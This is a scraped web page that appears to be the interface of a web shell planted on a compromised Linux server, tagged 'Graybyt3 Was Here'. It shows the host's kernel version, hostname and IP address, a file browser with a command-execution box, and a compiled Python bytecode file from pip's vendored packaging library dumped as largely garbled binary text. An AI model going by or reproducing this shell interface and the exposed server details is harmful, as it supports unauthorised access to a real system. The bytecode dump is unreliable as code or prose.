Graybyt3 Was Here
Linux cloud.locucionar.com 3.10.0-1160.81.1.el7.x86_64 #1 SMP Fri Dec 16 17:29:43 UTC 2022 x86_64
Apache
91.191.211.241
/
opt
/
imunify360
/
venv
/
lib64
/
python3.11
/
site-packages
/
pip
/
_vendor
/
packaging
/
__pycache__
[ HOME ]
Exec
Submit
requirements.cpython-311.pyc
� #�Fh� � � � d dl mZ d dlmZmZ ddlmZ ddlm Z ddl mZmZ ddl mZ ddlmZ G d � d e� � Z G d� d� � Zd S )� )�annotations)�Any�Iterator� )�parse_requirement)�ParserSyntaxError)�Marker�_normalize_extra_values)�SpecifierSet)�canonicalize_namec � � e Zd ZdZdS )�InvalidRequirementzJ An invalid requirement was found, users should refer to PEP 508. N)�__name__� __module__�__qualname__�__doc__� � ��/builddir/build/BUILD/imunify360-venv-2.5.3/opt/imunify360/venv/lib/python3.11/site-packages/pip/_vendor/packaging/requirements.pyr r s � � � � � �� � � r r c �B � e Zd ZdZdd�Zdd �Zdd �Zdd�Zdd �Zdd�Z dS )�Requirementz�Parse a requirement. Parse a given requirement string into its parts, such as name, specifier, URL, and extras. Raises InvalidRequirement on a badly-formed requirement string. �requirement_string�str�return�Nonec � � t |� � }n/# t $ r"}t t |� � � � |�d }~ww xY w|j | _ |j pd | _ t |j pg � � | _ t |j � � | _ d | _ |j �>t j t � � | _ t |j � � | j _ d S d S �N)�_parse_requirementr r r �name�url�set�extrasr � specifier�markerr �__new__r �_markers)�selfr �parsed�es r �__init__zRequirement.__init__"